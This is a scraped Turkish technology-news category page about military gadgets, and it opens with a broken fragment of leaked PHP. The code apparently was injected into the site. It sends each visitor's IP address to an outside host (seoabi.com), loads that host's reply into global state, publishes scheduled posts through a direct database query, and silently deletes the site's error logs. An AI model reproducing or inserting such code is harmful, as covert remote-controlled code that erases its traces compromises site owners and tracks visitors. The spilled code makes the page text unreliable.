$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> askeri malzeme | Teknoloji Haberleri

askeri malzeme kategorisindeki tüm yazılar

Son Yazılar

Becerikli teknolojik askeri aletler

Gadgetsnu sitesinde toplanan bu teknolojik askeri aletler, teknolojik ordu anlayışına yeni bakış açıları getiriyor. Orduların kullandıkları araç ve aletlerin bilimin gelişimine yaptığı katkı herkes tarafından kabul edilen bir gerçektir. Şu anda kullandığımız İnternet bile ARPANET adıyla ABD Savunma Bakanlığının katkılarıyla oluşturulmuştur. Bakanlık daha sonra MILITARY-NET isimli kendi